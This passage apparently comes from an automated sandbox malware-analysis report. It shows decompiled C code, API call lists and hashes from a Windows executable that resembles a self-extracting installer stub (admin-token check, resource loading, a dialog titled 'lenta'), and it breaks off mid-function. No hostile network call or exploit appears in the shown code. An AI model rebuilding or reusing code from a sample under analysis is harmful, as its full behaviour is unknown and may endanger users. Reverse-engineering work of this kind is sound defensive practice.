                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8198c
                                                                      0x00f81991
                                                                      0x00f81996
                                                                      0x00000000
                                                                      0x00f81996
                                                                      0x00f8194c

                                                                      APIs
                                                                        • Part of subcall function 00F817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                        • Part of subcall function 00F817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                        • Part of subcall function 00F817EE: AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                        • Part of subcall function 00F817EE: FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                        • Part of subcall function 00F817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F818EB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F818F2
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F8190A
                                                                      • GetLastError.KERNEL32 ref: 00F81918
                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F8192C
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F81944
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F81964
                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00F8197A
                                                                      • FreeSid.ADVAPI32(?), ref: 00F8199C
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F819A3
                                                                      • CloseHandle.KERNEL32(?), ref: 00F819AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                      • Instruction ID: 5668ca8bb04facf79600e992d2315e5fe07a90ca33389f38551c9af48e5d7a45
                                                                      • Opcode Fuzzy Hash: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                      • Instruction Fuzzy Hash: 3D311971E00209EBEB20AFA5DC59AFFBBBCFB04750F10052AE545D2150DB349906EB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00F8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				long _t4;
                                                                      				void* _t11;
                                                                      				CHAR* _t14;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t11 = __edx;
                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                      				_t16 = _t4;
                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                      					if(_t16 == 0) {
                                                                      						L5:
                                                                      						return 0;
                                                                      					}
                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                      					FreeResource(_t15);
                                                                      					return _t16;
                                                                      				}
                                                                      				return _t4;
                                                                      			}








                                                                      0x00f84699
                                                                      0x00f8469b
                                                                      0x00f846a9
                                                                      0x00f846af
                                                                      0x00f846b4
                                                                      0x00f846bc
                                                                      0x00f846f9
                                                                      0x00000000
                                                                      0x00f846f9
                                                                      0x00f846d9
                                                                      0x00f846dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f846e5
                                                                      0x00f846ef
                                                                      0x00000000
                                                                      0x00f846f5
                                                                      0x00f846ff

                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                      • LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                      • memcpy_s.MSVCRT ref: 00F846E5
                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID: TITLE$lenta
                                                                      • API String ID: 3370778649-2035842925
                                                                      • Opcode ID: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                      • Instruction ID: 85ad2563db596ea34110a15934639ad1240650705a25ad884ba84c91a5fa9cc9
                                                                      • Opcode Fuzzy Hash: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                      • Instruction Fuzzy Hash: A901F9326442097BF32027A55C0CFFB7E2CDBC6F61F080015FA49971C0D9719840A7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E00F817EE(intOrPtr* __ecx) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				void* _v24;
                                                                      				intOrPtr* _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t14;
                                                                      				_Unknown_base(*)()* _t20;
                                                                      				long _t28;
                                                                      				void* _t35;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				signed int _t38;
                                                                      				intOrPtr* _t39;
                                                                      
                                                                      				_t14 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t14 ^ _t38;
                                                                      				_v12 = 0x500;
                                                                      				_t37 = __ecx;
                                                                      				_v16.Value = 0;
                                                                      				_v28 = __ecx;
                                                                      				_t28 = 0;
                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                      				if(_t36 != 0) {
                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                      					_v20 = _t20;
                                                                      					if(_t20 != 0) {
                                                                      						 *_t37 = 0;
                                                                      						_t28 = 1;
                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                      							_t37 = _t39;
                                                                      							 *0xf8a288(0, _v24, _v28);
                                                                      							_v20();
                                                                      							if(_t39 != _t39) {
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      							FreeSid(_v24);
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t36);
                                                                      				}
                                                                      				return E00F86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                      			}



















                                                                      0x00f817f6
                                                                      0x00f817fd
                                                                      0x00f81805
                                                                      0x00f8180b
                                                                      0x00f8180d
                                                                      0x00f81815
                                                                      0x00f81818
                                                                      0x00f81820
                                                                      0x00f81824
                                                                      0x00f8182c
                                                                      0x00f81832
                                                                      0x00f81837
                                                                      0x00f81851
                                                                      0x00f81854
                                                                      0x00f8185d
                                                                      0x00f81862
                                                                      0x00f8186c
                                                                      0x00f81872
                                                                      0x00f81877
                                                                      0x00f8187e
                                                                      0x00f8187e
                                                                      0x00f81883
                                                                      0x00f81883
                                                                      0x00f8185d
                                                                      0x00f8188a
                                                                      0x00f8188a
                                                                      0x00f818a2

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                      • AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                      • FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                      • API String ID: 4204503880-1888249752
                                                                      • Opcode ID: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                      • Instruction ID: b59704a69fe716f9aa49d14166eb9e7d063285a8d20c566dbf5e6ae3ee36b68e
                                                                      • Opcode Fuzzy Hash: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                      • Instruction Fuzzy Hash: 0A116A71E00209AFDB10AFA4DC4AAFEBB7CFF44711F10016AF905E6250DB719D059791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t7;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				int _t22;
                                                                      				struct HWND__* _t24;
                                                                      
                                                                      				_t7 = _a8 - 0x10;
                                                                      				if(_t7 == 0) {
                                                                      					EndDialog(_a4, 2);
                                                                      					L11:
                                                                      					return 1;
                                                                      				}
                                                                      				_t11 = _t7 - 0x100;
                                                                      				if(_t11 == 0) {
                                                                      					_t12 = GetDesktopWindow();
                                                                      					_t24 = _a4;
                                                                      					E00F843D0(_t24, _t12);
                                                                      					SetWindowTextA(_t24, "lenta");
                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xf89404);
                                                                      					SetForegroundWindow(_t24);
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t11 == 1) {
                                                                      					_t22 = _a12;
                                                                      					if(_t22 < 6) {
                                                                      						goto L11;
                                                                      					}
                                                                      					if(_t22 <= 7) {
                                                                      						L8:
                                                                      						EndDialog(_a4, _t22);
                                                                      						return 1;
                                                                      					}
                                                                      					if(_t22 != 0x839) {
                                                                      						goto L11;
                                                                      					}
                                                                      					 *0xf891dc = 1;
                                                                      					goto L8;
                                                                      				}
                                                                      				return 0;
                                                                      			}








                                                                      0x00f83459
                                                                      0x00f8345c
                                                                      0x00f834d8
                                                                      0x00f834de
                                                                      0x00000000
                                                                      0x00f834e0
                                                                      0x00f8345e
                                                                      0x00f83463
                                                                      0x00f8349a
                                                                      0x00f834a0
                                                                      0x00f834a7
                                                                      0x00f834b2
                                                                      0x00f834c4
                                                                      0x00f834cb
                                                                      0x00000000
                                                                      0x00f834cb
                                                                      0x00f83468
                                                                      0x00f8346e
                                                                      0x00f83474
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8347c
                                                                      0x00f8348c
                                                                      0x00f83490
                                                                      0x00000000
                                                                      0x00f83496
                                                                      0x00f83484
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83486
                                                                      0x00000000
                                                                      0x00f83486
                                                                      0x00000000

                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 00F83490
                                                                      • GetDesktopWindow.USER32 ref: 00F8349A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F834B2
                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00F834C4
                                                                      • SetForegroundWindow.USER32(?), ref: 00F834CB
                                                                      • EndDialog.USER32(?,00000002), ref: 00F834D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                      • String ID: lenta
                                                                      • API String ID: 852535152-2780258678
                                                                      • Opcode ID: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                      • Instruction ID: 3a4c848608eb3baff4ff59ed4fddf151d20713878418aa0db3f8dd6fc642cad3
                                                                      • Opcode Fuzzy Hash: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                      • Instruction Fuzzy Hash: 9701B132644518ABEB16AF64DC0C9FD3A64EB05F20F104411F947865B0CB749F51FB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00F82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				int _t21;
                                                                      				char _t32;
                                                                      				intOrPtr _t34;
                                                                      				char* _t38;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				CHAR* _t52;
                                                                      				intOrPtr* _t55;
                                                                      				CHAR* _t59;
                                                                      				void* _t62;
                                                                      				CHAR* _t64;
                                                                      				CHAR* _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t60 = __edx;
                                                                      				_t16 =  *0xf88004; // 0x644c7055
                                                                      				_t17 = _t16 ^ _t66;
                                                                      				_v8 = _t16 ^ _t66;
                                                                      				_t65 = _a4;
                                                                      				_t44 = __edx;
                                                                      				_t64 = __ecx;
                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                      					GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104);
                                                                      					while(1) {
                                                                      						_t17 =  *_t64;
                                                                      						if(_t17 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                      						 *_t65 =  *_t64;
                                                                      						if(_t21 != 0) {
                                                                      							_t65[1] = _t64[1];
                                                                      						}
                                                                      						if( *_t64 != 0x23) {
                                                                      							L19:
                                                                      							_t65 = CharNextA(_t65);
                                                                      						} else {
                                                                      							_t64 = CharNextA(_t64);
                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                      									if( *_t64 == 0x23) {
                                                                      										goto L19;
                                                                      									}
                                                                      								} else {
                                                                      									E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                      									_t52 = _t65;
                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                      									_t60 = _t14;
                                                                      									do {
                                                                      										_t32 =  *_t52;
                                                                      										_t52 =  &(_t52[1]);
                                                                      									} while (_t32 != 0);
                                                                      									goto L17;
                                                                      								}
                                                                      							} else {
                                                                      								E00F865E8( &_v268);
                                                                      								_t55 =  &_v268;
                                                                      								_t62 = _t55 + 1;
                                                                      								do {
                                                                      									_t34 =  *_t55;
                                                                      									_t55 = _t55 + 1;
                                                                      								} while (_t34 != 0);
                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                      									 *_t38 = 0;
                                                                      								}
                                                                      								E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                      								_t59 = _t65;
                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                      								_t60 = _t12;
                                                                      								do {
                                                                      									_t42 =  *_t59;
                                                                      									_t59 =  &(_t59[1]);
                                                                      								} while (_t42 != 0);
                                                                      								L17:
                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                      							}
                                                                      						}
                                                                      						_t64 = CharNextA(_t64);
                                                                      					}
                                                                      					 *_t65 = _t17;
                                                                      				}
                                                                      				return E00F86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                      			}






















                                                                      0x00f82aac
                                                                      0x00f82ab7
                                                                      0x00f82abc
                                                                      0x00f82abe
                                                                      0x00f82ac3
                                                                      0x00f82ac6
                                                                      0x00f82ac9
                                                                      0x00f82ace
                                                                      0x00f82ae6
                                                                      0x00f82bdc
                                                                      0x00f82bdc
                                                                      0x00f82be0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82af2
                                                                      0x00f82afc
                                                                      0x00f82b00
                                                                      0x00f82b05
                                                                      0x00f82b05
                                                                      0x00f82b0b
                                                                      0x00f82bca
                                                                      0x00f82bd1
                                                                      0x00f82b11
                                                                      0x00f82b18
                                                                      0x00f82b26
                                                                      0x00f82b99
                                                                      0x00f82bc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82b9b
                                                                      0x00f82bae
                                                                      0x00f82bb3
                                                                      0x00f82bb5
                                                                      0x00f82bb5
                                                                      0x00f82bb8
                                                                      0x00f82bb8
                                                                      0x00f82bba
                                                                      0x00f82bbb
                                                                      0x00000000
                                                                      0x00f82bb8
                                                                      0x00f82b28
                                                                      0x00f82b2e
                                                                      0x00f82b33
                                                                      0x00f82b39
                                                                      0x00f82b3c
                                                                      0x00f82b3c
                                                                      0x00f82b3e
                                                                      0x00f82b3f
                                                                      0x00f82b55
                                                                      0x00f82b5d
                                                                      0x00f82b64
                                                                      0x00f82b64
                                                                      0x00f82b7a
                                                                      0x00f82b7f
                                                                      0x00f82b81
                                                                      0x00f82b81
                                                                      0x00f82b84
                                                                      0x00f82b84
                                                                      0x00f82b86
                                                                      0x00f82b87
                                                                      0x00f82bbf
                                                                      0x00f82bc1
                                                                      0x00f82bc1
                                                                      0x00f82b26
                                                                      0x00f82bda
                                                                      0x00f82bda
                                                                      0x00f82be6
                                                                      0x00f82be6
                                                                      0x00f82bf8

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F82AE6
                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F82AF2
                                                                      • CharNextA.USER32(?), ref: 00F82B12
                                                                      • CharUpperA.USER32 ref: 00F82B1E
                                                                      • CharPrevA.USER32(?,?), ref: 00F82B55
                                                                      • CharNextA.USER32(?), ref: 00F82BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                      • String ID:
                                                                      • API String ID: 571164536-0
                                                                      • Opcode ID: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                      • Instruction ID: 9661ef238e8b256b6c7a8b87863ba2d7c40344dd726906a6f11e53b3f500099f
                                                                      • Opcode Fuzzy Hash: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                      • Instruction Fuzzy Hash: D6413A34A051495FEF55AF348C54AFD7BA9DF92310F14009AE8C287202DF399E46EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00F843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                      				signed int _v8;
                                                                      				struct tagRECT _v24;
                                                                      				struct tagRECT _v40;
                                                                      				struct HWND__* _v44;
                                                                      				intOrPtr _v48;
                                                                      				int _v52;
                                                                      				intOrPtr _v56;
                                                                      				int _v60;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				void* _t53;
                                                                      				intOrPtr _t56;
                                                                      				int _t59;
                                                                      				struct HWND__* _t63;
                                                                      				struct HWND__* _t67;
                                                                      				struct HWND__* _t68;
                                                                      				struct HDC__* _t69;
                                                                      				int _t72;
                                                                      				signed int _t74;
                                                                      
                                                                      				_t63 = __edx;
                                                                      				_t29 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t29 ^ _t74;
                                                                      				_t68 = __edx;
                                                                      				_v44 = __ecx;
                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                      				_v48 = _v40.right - _v40.left;
                                                                      				GetWindowRect(_t68,  &_v24);
                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                      				_t69 = GetDC(_v44);
                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                      				ReleaseDC(_v44, _t69);
                                                                      				_t56 = _v48;
                                                                      				asm("cdq");
                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                      				_t67 = 0;
                                                                      				if(_t72 >= 0) {
                                                                      					_t63 = _v52;
                                                                      					if(_t72 + _t56 > _t63) {
                                                                      						_t72 = _t63 - _t56;
                                                                      					}
                                                                      				} else {
                                                                      					_t72 = _t67;
                                                                      				}
                                                                      				asm("cdq");
                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                      				if(_t59 >= 0) {
                                                                      					_t63 = _v60;
                                                                      					if(_t59 + _t53 > _t63) {
                                                                      						_t59 = _t63 - _t53;
                                                                      					}
                                                                      				} else {
                                                                      					_t59 = _t67;
                                                                      				}
                                                                      				return E00F86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                      			}
























                                                                      0x00f843d0
                                                                      0x00f843d8
                                                                      0x00f843df
                                                                      0x00f843e6
                                                                      0x00f843ec
                                                                      0x00f843f1
                                                                      0x00f84400
                                                                      0x00f84403
                                                                      0x00f8440b
                                                                      0x00f84420
                                                                      0x00f84429
                                                                      0x00f84437
                                                                      0x00f84444
                                                                      0x00f84447
                                                                      0x00f8444d
                                                                      0x00f84454
                                                                      0x00f8445b
                                                                      0x00f84460
                                                                      0x00f84461
                                                                      0x00f84467
                                                                      0x00f8446f
                                                                      0x00f84473
                                                                      0x00f84473
                                                                      0x00f84463
                                                                      0x00f84463
                                                                      0x00f84463
                                                                      0x00f8447a
                                                                      0x00f84481
                                                                      0x00f84484
                                                                      0x00f8448a
                                                                      0x00f84492
                                                                      0x00f84496
                                                                      0x00f84496
                                                                      0x00f84486
                                                                      0x00f84486
                                                                      0x00f84486
                                                                      0x00f844b8

                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00F843F1
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00F8440B
                                                                      • GetDC.USER32(?), ref: 00F84423
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F8442E
                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F8443A
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F84447
                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F844A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                      • Instruction ID: 5cdb442add0bc3976f4e91dee0f0fb7790f49e40224488fddb167cd6dc9ed3c0
                                                                      • Opcode Fuzzy Hash: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                      • Instruction Fuzzy Hash: 6A315A32E0051DAFDB14DFB8DD889EEBBB5EB89310F254169F805F3250DA30AC059B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00F86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				struct HRSRC__* _t21;
                                                                      				intOrPtr _t26;
                                                                      				void* _t30;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr* _t40;
                                                                      				void* _t41;
                                                                      				intOrPtr* _t44;
                                                                      				intOrPtr* _t45;
                                                                      				void* _t47;
                                                                      				signed int _t50;
                                                                      				struct HINSTANCE__* _t51;
                                                                      
                                                                      				_t44 = __edx;
                                                                      				_t16 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t16 ^ _t50;
                                                                      				_t46 = 0;
                                                                      				_v32 = __ecx;
                                                                      				_v36 = 0;
                                                                      				_t36 = 1;
                                                                      				E00F8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                      				while(1) {
                                                                      					_t51 = _t51 + 0x10;
                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                      					if(_t21 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                      					if(_t45 == 0) {
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						_t36 = _t46;
                                                                      					} else {
                                                                      						_t5 = _t45 + 8; // 0x8
                                                                      						_t44 = _t5;
                                                                      						_t40 = _t44;
                                                                      						_t6 = _t40 + 1; // 0x9
                                                                      						_t47 = _t6;
                                                                      						do {
                                                                      							_t26 =  *_t40;
                                                                      							_t40 = _t40 + 1;
                                                                      						} while (_t26 != 0);
                                                                      						_t41 = _t40 - _t47;
                                                                      						_t46 = _t51;
                                                                      						_t7 = _t41 + 1; // 0xa
                                                                      						 *0xf8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                      						_t30 = _v32();
                                                                      						if(_t51 != _t51) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						_push(_t45);
                                                                      						if(_t30 == 0) {
